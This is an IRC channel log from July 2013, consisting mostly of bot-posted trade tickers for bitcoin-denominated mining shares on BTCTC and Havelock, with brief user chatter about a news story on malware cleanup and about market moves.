[BTCTC] [BASIC-MINING] 12 @ 0.2092 = 2.5104 BTC [+] Jul 08 22:27:12 [BTCTC] [BASIC-MINING] 12 @ 0.21 = 2.52 BTC [+] Jul 08 22:27:14 [BTCTC] [BASIC-MINING] 20 @ 0.21 = 4.2 BTC [+] Jul 08 22:27:30 [BTCTC] [BASIC-MINING] 2 @ 0.211 = 0.422 BTC [+] Jul 08 22:28:16 [BTCTC] [GSDPT] 100 @ 0.002011 = 0.2011 BTC [+] Jul 08 22:28:35 [BTCTC] [BASIC-MINING] 8 @ 0.215 = 1.72 BTC [+] Jul 08 22:29:19 [BTCTC] [BASIC-MINING] 2 @ 0.215 = 0.43 BTC [+] Jul 08 22:29:21 [BTCTC] [BASIC-MINING] 50 @ 0.219999 = 11 BTC [+] Jul 08 22:31:59 [BTCTC] [AMC-PT] 87 @ 0.00212 = 0.1844 BTC [+] Jul 08 22:32:00 [BTCTC] [AMC-PT] 30 @ 0.00212 = 0.0636 BTC [+] Jul 08 22:33:16 [BTCTC] [AMC-PT] 25 @ 0.002125 = 0.0531 BTC [+] Jul 08 22:33:18 [BTCTC] [AMC-PT] 30 @ 0.002125 = 0.0638 BTC [+] Jul 08 22:34:34 [BTCTC] [AMC-PT] 12 @ 0.00213 = 0.0256 BTC [+] Jul 08 22:35:35 [BTCTC] [AMC-PT] 100 @ 0.00215 = 0.215 BTC [+] Jul 08 22:35:37 [BTCTC] [AMC-PT] 45 @ 0.00215 = 0.0968 BTC [+] Jul 08 22:35:57 [BTCTC] [TAT.ASICMINER] 4 @ 0.0438 = 0.1752 BTC [+] Jul 08 22:39:04 [BTCTC] [COGNITIVE] 1 @ 0.270001 BTC [-] Jul 08 22:39:05 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Jul 08 22:40:43 http://www.theverge.com/2013/7/8/4503946/commerce-department-unnecessary-cybersecurity-computer-destruction Jul 08 22:40:46 US Commerce Department destroyed $170,000 worth of TVs, mice, and more to root out malware | The Ver Jul 08 22:41:11 "The department destroyed over $170,000 worth of equipment in the process, including printers, TVs, and mice, and only stopped destroying them when its disposal budget ran out. But, as the department's own auditor put it, "The destruction of IT components was clearly unnecessary." Indeed, throwing away computer mice seems like a poor approach to ridding an organization of digital Jul 08 22:41:11 threats." Jul 08 22:43:02 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [+] Jul 08 22:43:04 [BTCTC] [ASICMINER-PT] 2 @ 4.4 = 8.8 BTC [+] Jul 08 22:43:05 [BTCTC] [DMS.PURCHASE] 15 @ 0.048997 = 0.735 BTC [+] Jul 08 22:43:18 [BTCTC] [TAT.ASICMINER] 2 @ 0.0438 = 0.0876 BTC [+] Jul 08 22:43:43 [BTCTC] [BASIC-MINING] 1 @ 0.22 BTC [+] Jul 08 22:44:58 [BTCTC] [TAT.VIRTUALMINE] 16 @ 0.00474 = 0.0758 BTC [+] Jul 08 22:48:18 ... Jul 08 22:48:41 [BTCTC] [BASIC-MINING] 49 @ 0.22 = 10.78 BTC [+] Jul 08 22:50:09 Perhaps it was unnecessary to destroy all that equipment. But do you know what was necessary? Jul 08 22:51:03 [BTCTC] [BASIC-MINING] 15 @ 0.239999 = 3.6 BTC [+] Jul 08 22:51:06 I think you can guess where I'm going with that... Jul 08 22:54:59 [BTCTC] [ASICMINER-PT] 1 @ 4.424988 BTC [+] Jul 08 22:56:21 what, you don't install MacAffee on your mice? Jul 08 22:57:44 [BTCTC] [BASIC-MINING] 29 @ 0.239999 = 6.96 BTC [+] Jul 08 22:58:17 Man basic has been rising quite a bit recently Jul 08 22:59:29 [BTCTC] [ASICMINER-PT] 1 @ 4.425 BTC [+] Jul 08 23:08:15 [BTCTC] [TAT.ASICMINER] 12 @ 0.043003 = 0.516 BTC [-] Jul 08 23:08:30 [BTCTC] [TAT.ASICMINER] 19 @ 0.0438 = 0.8322 BTC [+] Jul 08 23:08:42 [BTCTC] [BASIC-MINING] 2 @ 0.239999 = 0.48 BTC [+] Jul 08 23:09:56 [BTCTC] [TAT.ASICMINER] 12 @ 0.043799 = 0.5256 BTC [-] Jul 08 23:09:58 [BTCTC] [TAT.ASICMINER] 25 @ 0.0439 = 1.0975 BTC [+] Jul 08 23:12:20 [BTCTC] [ASICMINER-PT] 1 @ 4.358515 BTC [-] Jul 08 23:12:58 [BTCTC] [ASICMINER-PT] 1 @ 4.358 BTC [-] Jul 08 23:13:40 [BTCTC] [ASICMINER-PT] 2 @ 4.357009 = 8.714 BTC [-] Jul 08 23:13:42 [BTCTC] [ASICMINER-PT] 1 @ 4.357009 BTC [-] Jul 08 23:15:20 [BTCTC] [BASIC-MINING] 1 @ 0.23 BTC [-] Jul 08 23:16:05 [BTCTC] [BASIC-MINING] 54 @ 0.239999 = 12.9599 BTC [+] Jul 08 23:16:43 [BTCTC] [BASIC-MINING] 20 @ 0.24 = 4.8 BTC [+] Jul 08 23:17:22 [BTCTC] [BASIC-MINING] 30 @ 0.18 = 5.4 BTC [-] Jul 08 23:17:35 [BTCTC] [ASICMINER-PT] 1 @ 4.357009 BTC [-] Jul 08 23:18:22 [BTCTC] [BASIC-MINING] 15 @ 0.244 = 3.66 BTC [+] Jul 08 23:21:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.043005 BTC [-] Jul 08 23:21:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.043005 = 0.086 BTC [-] Jul 08 23:26:03 [BTCTC] [BFMINES] 1000 @ 0.00399 = 3.99 BTC [+] Jul 08 23:26:36 [BTCTC] [COGNITIVE] 1 @ 0.27 BTC [-] Jul 08 23:27:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.043005 BTC [-] Jul 08 23:28:12 [BTCTC] [BASIC-MINING] 2 @ 0.243 = 0.486 BTC [-] Jul 08 23:31:01 [HAVELOCK] [ASICM] 15 @ 0.043985 = 0.6598 BTC [+] Jul 08 23:32:15 [BTCTC] [AMC-PT] 55 @ 0.00215 = 0.1183 BTC [+] Jul 08 23:32:18 [BTCTC] [BASIC-MINING] 1 @ 0.243 BTC [-] Jul 08 23:32:43 [BTCTC] [BASIC-MINING] 10 @ 0.2475 = 2.475 BTC [+] Jul 08 23:33:14 [BTCTC] [ASICMINER-PT] 1 @ 4.357008 BTC [-] Jul 08 23:33:16 [BTCTC] [ASICMINER-PT] 1 @ 4.357008 BTC [-] Jul 08 23:35:17 [BTCTC] [BASIC-MINING] 10 @ 0.2475 = 2.475 BTC [+] Jul 08 23:36:23 [BTCTC] [RSM] 5 @ 0.016006 = 0.08 BTC [+] Jul 08 23:41:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.043899 = 0.0878 BTC [+] Jul 08 23:46:28 [BTCTC] [TAT.ASICMINER] 12 @ 0.043007 = 0.5161 BTC [-] Jul 08 23:47:09 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1991 BTC [-] Jul 08 23:49:17 [BTCTC] [AMC-PT] 100 @ 0.001892 = 0.1892 BTC [-] Jul 08 23:50:10 [BTCTC] [AMC-PT] 200 @ 0.001891 = 0.3782 BTC [-] Jul 08 23:50:18 [BTCTC] [AMC-PT] 200 @ 0.001891 = 0.3782 BTC [-] Jul 08 23:50:19 [BTCTC] [AMC-PT] 110 @ 0.00189 = 0.2079 BTC [-] Jul 08 23:51:21 [BTCTC] [BASIC-MINING] 2 @ 0.287998 = 0.576 BTC [+] Jul 08 23:51:35 [HAVELOCK] [HIM] 2 @ 0.3003 = 0.6006 BTC [-] Jul 08 23:52:27 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199 BTC [-] Jul 08 23:52:58 [BTCTC] [BASIC-MINING] 5 @ 0.287999 = 1.44 BTC [+] Jul 08 23:53:44 [BTCTC] [BASIC-MINING] 1 @ 0.287999 BTC [+] Jul 08 23:54:48 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.004729 = 0.1182 BTC [-] Jul 08 23:55:37 [BTCTC] [DMS.MINING] 1 @ 0.019249 BTC [-] Jul 08 23:55:39 [BTCTC] [DMS.MINING] 1 @ 0.019249 BTC [-] Jul 08 23:55:40 [BTCTC] [DMS.MINING] 9 @ 0.01925 = 0.1733 BTC [+] Jul 08 23:58:19 [BTCTC] [TAT.ASICMINER] 18 @ 0.043007 = 0.7741 BTC [-] Jul 08 23:59:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.043007 = 0.086 BTC [-] Jul 09 00:00:19 [BTCTC] [AMC-PT] 8 @ 0.00189 = 0.0151 BTC [-] Jul 09 00:00:21 [BTCTC] [BASIC-MINING] 3 @ 0.2875 = 0.8625 BTC [-] Jul 09 00:01:01 [HAVELOCK] [SDICE] 1 @ 0.205 BTC [-] Jul 09 00:01:25 [BTCTC] [TAT.ASICMINER] 18 @ 0.043007 = 0.7741 BTC [-] Jul 09 00:01:54 [BTCTC] [MININGCO.ETF] 2 @ 1.02 = 2.04 BTC [-] Jul 09 00:02:25 [HAVELOCK] [HIM] 1 @ 0.3003 BTC [-] Jul 09 00:02:43 [HAVELOCK] [SDICE] 1 @ 0.205 BTC [-] Jul 09 00:03:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.043006 BTC [-] Jul 09 00:03:09 [HAVELOCK] [ASICM] 2 @ 0.043098 = 0.0862 BTC [-] Jul 09 00:03:14 [BTCTC] [TAT.VIRTUALMINE] 175 @ 0.0047 = 0.8225 BTC [-] Jul 09 00:03:40 [HAVELOCK] [HIM] 1 @ 0.3003 BTC [-] Jul 09 00:03:58 [HAVELOCK] [ASICM] 1 @ 0.0427 BTC [-] Jul 09 00:04:33 [BTCTC] [PAJKA.BOND] 10 @ 0.051999 = 0.52 BTC [-] Jul 09 00:04:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.043899 = 0.0878 BTC [+] Jul 09 00:04:58 [BTCTC] [PAJKA.BOND] 15 @ 0.054998 = 0.825 BTC [+] Jul 09 00:05:45 [BTCTC] [BASIC-MINING] 3 @ 0.269 = 0.807 BTC [-] Jul 09 00:07:09 [BTCTC] [S.DICE-PT] 9 @ 0.002366 = 0.0213 BTC [-] Jul 09 00:07:31 [BTCTC] [TAT.ASICMINER] 21 @ 0.043899 = 0.9219 BTC [+] Jul 09 00:09:00 [BTCTC] [TAT.ASICMINER] 2 @ 0.043007 = 0.086 BTC [-] Jul 09 00:09:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.043006 = 0.086 BTC [-] Jul 09 00:09:34 [HAVELOCK] [ASICM] 1 @ 0.0427 BTC [-] Jul 09 00:09:36 [HAVELOCK] [ASICM] 1 @ 0.0424 BTC [-] Jul 09 00:14:22 [HAVELOCK] [ASICM] 1 @ 0.042203 BTC [-] Jul 09 00:18:41 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004729 BTC [+] Jul 09 00:20:07 [HAVELOCK] [ASICM] 1 @ 0.042901 BTC [+] Jul 09 00:22:18 [HAVELOCK] [ASICM] 65 @ 0.042901 = 2.7886 BTC [+] Jul 09 00:23:29 [HAVELOCK] [ASICM] 1 @ 0.04307 BTC [+] Jul 09 00:23:31 [HAVELOCK] [ASICM] 55 @ 0.043078 = 2.3693 BTC [+] Jul 09 00:23:32 [HAVELOCK] [ASICM] 194 @ 0.043079 = 8.3573 BTC [+] Jul 09 00:23:41 [HAVELOCK] [ASICM] 10 @ 0.043078 = 0.4308 BTC [-] Jul 09 00:23:55 [HAVELOCK] [ASICM] 2 @ 0.043078 = 0.0862 BTC [-] Jul 09 00:26:54 [HAVELOCK] [ASICM] 1 @ 0.043078 BTC [-] Jul 09 00:29:54 [BTCTC] [BFMINES] 550 @ 0.00399 = 2.1945 BTC [+] Jul 09 00:34:43 [HAVELOCK] [ASICM] 10 @ 0.043078 = 0.4308 BTC [-] Jul 09 00:34:44 [HAVELOCK] [ASICM] 66 @ 0.043079 = 2.8432 BTC [+] Jul 09 00:35:32 [BTCTC] [TAT.ASICMINER] 11 @ 0.043899 = 0.4829 BTC [+] Jul 09 00:36:44 [HAVELOCK] [ASICM] 25 @ 0.043 = 1.075 BTC [-] Jul 09 00:36:54 [BTCTC] [AMC-PT] 90 @ 0.002159 = 0.1943 BTC [+] Jul 09 00:36:56 [BTCTC] [AMC-PT] 100 @ 0.002159 = 0.2159 BTC [+] Jul 09 00:36:57 [BTCTC] [AMC-PT] 100 @ 0.002159 = 0.2159 BTC [+] Jul 09 00:36:59 [BTCTC] [AMC-PT] 100 @ 0.002159 = 0.2159 BTC [+] Jul 09 00:39:10 [BTCTC] [AMC-PT] 78 @ 0.00216 = 0.1685 BTC [+] Jul 09 00:39:22 [BTCTC] [AMC-PT] 50 @ 0.00216 = 0.108 BTC [+] Jul 09 00:39:50 [BTCTC] [DMS.PURCHASE] 2 @ 0.048997 = 0.098 BTC [+] Jul 09 00:42:53 [HAVELOCK] [ASICM] 3 @ 0.043098 = 0.1293 BTC [+] Jul 09 00:42:58 [HAVELOCK] [ASICM] 1 @ 0.043098 BTC [+] Jul 09 00:43:45 [HAVELOCK] [ASICM] 19 @ 0.043098 = 0.8189 BTC [+] Jul 09 00:50:30 [BTCTC] [BASIC-MINING] 2 @ 0.269 = 0.538 BTC [-] Jul 09 00:53:17 [BTCTC] [COGNITIVE] 1 @ 0.270001 BTC [+] Jul 09 00:53:20 [BTCTC] [COGNITIVE] 1 @ 0.27 BTC [-] Jul 09 00:53:23 [BTCTC] [COGNITIVE] 4 @ 0.261111 = 1.0444 BTC [-] Jul 09 00:53:25 [BTCTC] [COGNITIVE] 11 @ 0.26111 = 2.8722 BTC [-] Jul 09 00:53:39 [BTCTC] [COGNITIVE] 1 @ 0.2511 BTC [-] Jul 09 00:54:04 [BTCTC] [BASIC-MINING] 1 @ 0.2799 BTC [+] Jul 09 00:54:27 [BTCTC] [COGNITIVE] 4 @ 0.251001 = 1.004 BTC [-] Jul 09 00:54:30 [BTCTC] [COGNITIVE] 1 @ 0.251 BTC [-] Jul 09 00:58:39 [BTCTC] [AMC-PT] 5 @ 0.00216 = 0.0108 BTC [+] Jul 09 01:02:28 ;;seen mircea_popescu Jul 09 01:02:29 mircea_popescu was last seen in #bitcoin-assets 3 hours, 6 minutes, and 29 seconds ago: matthew_boyd i think you speak for most people here when you say that. Jul 09 01:02:38 [BTCTC] [ASICMINER-PT] 1 @ 4.4247 BTC [+] Jul 09 01:07:59 [BTCTC] [TAT.ASICMINER] 25 @ 0.043899 = 1.0975 BTC [+] Jul 09 01:08:34 So I'm thinking of selling all my AM stock for some basic Jul 09 01:09:02 and ride this little train they have going on, but I feel like I missed the majority of it Jul 09 01:12:02 [BTCTC] [TAT.ASICMINER] 14 @ 0.043899 = 0.6146 BTC [+] Jul 09 01:14:04 [HAVELOCK] [ASICM] 92 @ 0.043099 = 3.9651 BTC [+] Jul 09 01:14:23 [BTCTC] [ASICMINER-PT] 1 @ 4.424779 BTC [+] Jul 09 01:14:47 [BTCTC] [ASICMINER-PT] 1 @ 4.42478 BTC [+] Jul 09 01:15:14 [BTCTC] [ASICMINER-PT] 1 @ 4.4248 BTC [+] Jul 09 01:16:39 [BTCTC] [TAT.ASICMINER] 8 @ 0.04388 = 0.351 BTC [-] Jul 09 01:16:41 [BTCTC] [TAT.ASICMINER] 51 @ 0.0439 = 2.2389 BTC [+] Jul 09 01:18:44 [HAVELOCK] [ASICM] 1 @ 0.043098 BTC [-] Jul 09 01:18:45 [HAVELOCK] [ASICM] 1 @ 0.043099 BTC [+] Jul 09 01:20:42 [BTCTC] [AMC-PT] 13 @ 0.00216 = 0.0281 BTC [+] Jul 09 01:25:54 [BTCTC] [AMC-PT] 5 @ 0.00216 = 0.0108 BTC [+] Jul 09 01:27:21 [BTCTC] [BFMINES] 2432 @ 0.00399 = 9.7037 BTC [+] Jul 09 01:27:23 [BTCTC] [BFMINES] 220 @ 0.003999 = 0.8798 BTC [+] Jul 09 01:28:17 [HAVELOCK] [ASICM] 158 @ 0.043099 = 6.8096 BTC [+] Jul 09 01:28:19 [HAVELOCK] [ASICM] 147 @ 0.0431 = 6.3357 BTC [+] Jul 09 01:28:20 [BTCTC] [BFMINES] 339 @ 0.004 = 1.356 BTC [+] Jul 09 01:29:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.043899 = 0.0878 BTC [-] Jul 09 01:30:01 [BTCTC] [BFMINES] 400 @ 0.004 = 1.6 BTC [+] Jul 09 01:30:42 [BTCTC] [DMS.MINING] 1 @ 0.019496 BTC [+] Jul 09 01:34:21 [BTCTC] [TAT.ASICMINER] 142 @ 0.0439 = 6.2338 BTC [+] Jul 09 01:36:01 [BTCTC] [S.MPOE-PT] 10 @ 0.000988 = 0.0099 BTC [+] Jul 09 01:36:03 [BTCTC] [S.MPOE-PT] 996 @ 0.000989 = 0.985 BTC [+] Jul 09 01:38:22 [BTCTC] [TAT.ASICMINER] 10 @ 0.04399 = 0.4399 BTC [+] Jul 09 01:38:24 [BTCTC] [TAT.ASICMINER] 25 @ 0.044 = 1.1 BTC [+] Jul 09 01:38:26 [BTCTC] [TAT.ASICMINER] 25 @ 0.044 = 1.1 BTC [+] Jul 09 01:39:26 [HAVELOCK] [ASICM] 545 @ 0.042204 = 23.0012 BTC [-] Jul 09 01:40:26 [HAVELOCK] [ASICM] 185 @ 0.042204 = 7.8077 BTC [-] Jul 09 01:40:31 [HAVELOCK] [ASICM] 74 @ 0.042204 = 3.1231 BTC [-] Jul 09 01:41:09 [BTCTC] [B.YABMC] 1 @ 0.0051 BTC [-] Jul 09 01:41:25 [BTCTC] [B.YABMC] 4 @ 0.005 = 0.02 BTC [-] Jul 09 01:42:01 [BTCTC] [AMC-PT] 12 @ 0.00216 = 0.0259 BTC [+] Jul 09 02:00:28 [BTCTC] [TAT.ASICMINER] 45 @ 0.043056 = 1.9375 BTC [-] Jul 09 02:02:51 [BTCTC] [S.MPOE-PT] 7 @ 0.000896 = 0.0063 BTC [-] Jul 09 02:02:56 [BTCTC] [AMC-PT] 400 @ 0.00216 = 0.864 BTC [+] Jul 09 02:04:07 [BTCTC] [TAT.ASICMINER] 45 @ 0.044004 = 1.9802 BTC [+] Jul 09 02:04:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.043057 BTC [-] Jul 09 02:04:19 [BTCTC] [AMC-PT] 390 @ 0.00216 = 0.8424 BTC [+] Jul 09 02:04:20 [BTCTC] [AMC-PT] 200 @ 0.00216 = 0.432 BTC [+] Jul 09 02:04:46 [BTCTC] [AMC-PT] 19 @ 0.00218 = 0.0414 BTC [+] Jul 09 02:05:34 [BTCTC] [TAT.ASICMINER] 6 @ 0.044005 = 0.264 BTC [+] Jul 09 02:05:52 [BTCTC] [AMC-PT] 23 @ 0.00218 = 0.0501 BTC [+] Jul 09 02:08:14 [BTCTC] [AMC-PT] 58 @ 0.00218 = 0.1264 BTC [+] Jul 09 02:08:43 [BTCTC] [AMC-PT] 87 @ 0.0022 = 0.1914 BTC [+] Jul 09 02:08:45 [BTCTC] [AMC-PT] 7 @ 0.0022 = 0.0154 BTC [+] Jul 09 02:09:02 [BTCTC] [AMC-PT] 58 @ 0.00218 = 0.1264 BTC [-] Jul 09 02:09:04 [BTCTC] [AMC-PT] 110 @ 0.00216 = 0.2376 BTC [-] Jul 09 02:09:05 [BTCTC] [AMC-PT] 100 @ 0.002001 = 0.2001 BTC [-] Jul 09 02:09:07 [BTCTC] [AMC-PT] 15763 @ 0.002 = 31.526 BTC [-] Jul 09 02:09:39 [BTCTC] [AMC-PT] 15 @ 0.0022 = 0.033 BTC [+] Jul 09 02:09:39 [BTCTC] [AMC-PT] 10 @ 0.0022 = 0.022 BTC [+] Jul 09 02:09:41 [BTCTC] [AMC-PT] 100 @ 0.002225 = 0.2225 BTC [+] Jul 09 02:10:19 [BTCTC] [BASIC-MINING] 3 @ 0.2799 = 0.8397 BTC [+] Jul 09 02:12:15 [BTCTC] [AMC-PT] 400 @ 0.00224 = 0.896 BTC [+] Jul 09 02:13:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.0441 = 0.0882 BTC [+] Jul 09 02:14:18 [BTCTC] [ASICMINER-PT] 1 @ 4.42499 BTC [+] Jul 09 02:14:45 [BTCTC] [TAT.ASICMINER] 16 @ 0.0441 = 0.7056 BTC [+] Jul 09 02:14:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.0441 BTC [+] Jul 09 02:14:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.0441 BTC [+] Jul 09 02:15:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.0441 BTC [+] Jul 09 02:16:02 [BTCTC] [AMC-PT] 1 @ 0.00224 BTC [+] Jul 09 02:16:04 [BTCTC] [AMC-PT] 379 @ 0.00224 = 0.849 BTC [+] Jul 09 02:20:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.043057 BTC [-] Jul 09 02:21:58 [BTCTC] [TAT.ASICMINER] 15 @ 0.043057 = 0.6459 BTC [-] Jul 09 02:21:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.043057 BTC [-] Jul 09 02:27:38 [HAVELOCK] [HIM] 2 @ 0.3 = 0.6 BTC [-] Jul 09 02:28:18 [HAVELOCK] [HIM] 2 @ 0.29 = 0.58 BTC [-] Jul 09 02:28:34 [BTCTC] [AMC-PT] 100 @ 0.002239 = 0.2239 BTC [-] Jul 09 02:33:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 02:33:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 02:33:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 02:33:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 02:37:20 [BTCTC] [TAT.VIRTUALMINE] 62 @ 0.004729 = 0.2932 BTC [+] Jul 09 02:38:47 [BTCTC] [DMS.MINING] 17 @ 0.0194 = 0.3298 BTC [-] Jul 09 02:38:49 [BTCTC] [DMS.MINING] 14 @ 0.019496 = 0.2729 BTC [+] Jul 09 02:38:50 [BTCTC] [DMS.MINING] 2 @ 0.019496 = 0.039 BTC [+] Jul 09 02:38:52 [BTCTC] [DMS.MINING] 25 @ 0.019497 = 0.4874 BTC [+] Jul 09 02:38:54 [BTCTC] [DMS.MINING] 39 @ 0.019498 = 0.7604 BTC [+] Jul 09 02:38:55 [BTCTC] [DMS.MINING] 83 @ 0.0195 = 1.6185 BTC [+] Jul 09 02:38:55 [BTCTC] [DMS.MINING] 83 @ 0.0195 = 1.6185 BTC [+] Jul 09 02:38:57 [BTCTC] [DMS.MINING] 10 @ 0.01965 = 0.1965 BTC [+] Jul 09 02:38:58 [BTCTC] [DMS.MINING] 10 @ 0.019655 = 0.1966 BTC [+] Jul 09 02:38:59 [BTCTC] [DMS.MINING] 40 @ 0.0197 = 0.788 BTC [+] Jul 09 02:39:01 [BTCTC] [DMS.MINING] 30 @ 0.01975 = 0.5925 BTC [+] Jul 09 02:39:12 $vwap Jul 09 02:39:14 mircea_popescu: http://pastebin.com/raw.php?i=ZnYLen5A Jul 09 02:39:19 a there she is. Jul 09 02:40:26 ;;ticker Jul 09 02:40:26 MtGox BTCUSD ticker | Best bid: 76.01001, Best ask: 76.58190, Bid-ask spread: 0.57189, Last trade: 76.58191, 24 hour volume: 65466.91322594, 24 hour low: 72.46000, 24 hour high: 80.00000, 24 hour vwap: 76.73802 Jul 09 02:41:02 [HAVELOCK] [ASICM] 1 @ 0.043095 BTC [+] Jul 09 02:42:18 [BTCTC] [AMC-PT] 160 @ 0.002246 = 0.3594 BTC [+] Jul 09 02:43:05 [BTCTC] [BASIC-MINING] 6 @ 0.2799 = 1.6794 BTC [+] Jul 09 02:43:12 [BTCTC] [TAT.ASICMINER] 6 @ 0.04305 = 0.2583 BTC [-] Jul 09 02:43:14 [BTCTC] [TAT.ASICMINER] 4 @ 0.04305 = 0.1722 BTC [-] Jul 09 02:43:37 [BTCTC] [BFMINES] 44 @ 0.004 = 0.176 BTC [+] Jul 09 02:43:48 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.00473 = 0.2365 BTC [+] Jul 09 02:44:54 [BTCTC] [AMC-PT] 90 @ 0.002246 = 0.2021 BTC [+] Jul 09 02:45:12 [BTCTC] [TAT.ASICMINER] 10 @ 0.04305 = 0.4305 BTC [-] Jul 09 02:47:11 [BTCTC] [AMC-PT] 210 @ 0.002246 = 0.4717 BTC [+] Jul 09 02:47:33 [HAVELOCK] [ASICM] 1 @ 0.0425 BTC [-] Jul 09 02:47:40 [HAVELOCK] [ASICM] 39 @ 0.042471 = 1.6564 BTC [-] Jul 09 02:49:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.04305 BTC [-] Jul 09 02:50:57 [BTCTC] [DMS.PURCHASE] 1 @ 0.048997 BTC [+] Jul 09 02:51:11 sweet mpexbot is back :D Jul 09 02:51:36 $depth s.mpoe Jul 09 02:51:37 mod6: S.MPOE Bids: ['3200 @ 0.00078714', '10950 @ 0.00078423', '487 @ 0.00077252', '30320 @ 0.00077251', '31256029 @ 0.0007725'] Jul 09 02:51:38 mod6: Asks: ['16306 @ 0.00080075', '5000 @ 0.00081822', '26400 @ 0.00081823', '15000 @ 0.00082', '5000 @ 0.00085822'] Jul 09 02:52:07 $vwap s.mpoe Jul 09 02:52:08 mod6: S.MPOE 1 day: average: 0.00079768 high: 0.00080341 low: 0.00079462 volume: 47178 btc: 37.63288833 7 day: average: 0.00079381 high: 0.00083551 low: 0.0007725 volume: 1960555 btc: 1556.31103025 30 day: average: 0.00077117 high: 0.00083673 low: 0.0006575 volume: 60105502 btc: 46351.6990592 Jul 09 02:52:13 why isnt bitfunder shown here? is there another channel that shows sales/buys Jul 09 02:53:06 nm looks like #bitfunder does Jul 09 02:53:19 [BTCTC] [AMC-PT] 250 @ 0.002246 = 0.5615 BTC [+] Jul 09 02:54:57 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004744 BTC [+] Jul 09 02:56:19 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004745 = 0.0475 BTC [+] Jul 09 02:57:02 [HAVELOCK] [ASICM] 1 @ 0.043089 BTC [+] Jul 09 02:57:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.04305 = 0.2153 BTC [-] Jul 09 02:58:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.04305 BTC [-] Jul 09 02:59:04 [BTCTC] [COGNITIVE] 1 @ 0.251 BTC [-] Jul 09 03:01:18 [BTCTC] [TAT.ASICMINER] 4 @ 0.04305 = 0.1722 BTC [-] Jul 09 03:01:26 [BTCTC] [PAJKA.BOND] 1 @ 0.045139 BTC [-] Jul 09 03:03:19 [HAVELOCK] [ASICM] 1 @ 0.043 BTC [-] Jul 09 03:03:41 AMC is now molting into a new re-scam or something, this time he's actually outright calling it AM... https://bitcointalk.org/index.php?topic=252531.0 Jul 09 03:04:25 [HAVELOCK] [ASICM] 1 @ 0.0429 BTC [-] Jul 09 03:07:29 [BTCTC] [TAT.ASICMINER] 35 @ 0.043049 = 1.5067 BTC [-] Jul 09 03:07:31 [BTCTC] [TAT.ASICMINER] 30 @ 0.04305 = 1.2915 BTC [+] Jul 09 03:07:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.043316 BTC [+] Jul 09 03:07:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.043316 BTC [+] Jul 09 03:07:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.043316 BTC [+] Jul 09 03:07:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.043316 BTC [+] Jul 09 03:07:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.043316 BTC [+] Jul 09 03:08:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.043316 BTC [+] Jul 09 03:08:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.043317 BTC [+] Jul 09 03:08:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.043319 BTC [+] Jul 09 03:09:03 [BTCTC] [AMC-PT] 447 @ 0.002246 = 1.004 BTC 